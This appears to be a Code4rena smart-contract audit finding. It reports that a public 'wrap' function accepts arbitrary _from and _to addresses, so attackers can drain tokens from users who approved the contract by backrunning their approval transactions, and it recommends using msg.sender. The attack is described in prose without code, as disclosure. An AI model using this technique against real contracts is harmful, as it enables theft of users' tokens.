'wrap' tokens that you are not entitled to

[code423n4]

Handle

pauliax

Vulnerability details

Impact

function wrap can be called by anyone. It accepts arbitrary _from and _to, and transfers 'from', and mints 'to'. A malicious actor can transfer from other users that have approved the contract before, e.g. an EOA user will need to execute 2 txs: first, approve and then wrap, so an attacker can monitor the mempool and backrun the approval tx. Also, a common practice is to approve more (or even unlimited) amounts, so such users will also lose their tokens.

Recommended Mitigation Steps

A simple solution would be to remove _from parameter and use msg.sender instead.

[kingyetifinance]

Duplicate #58

[alcueca]

Duplicate #208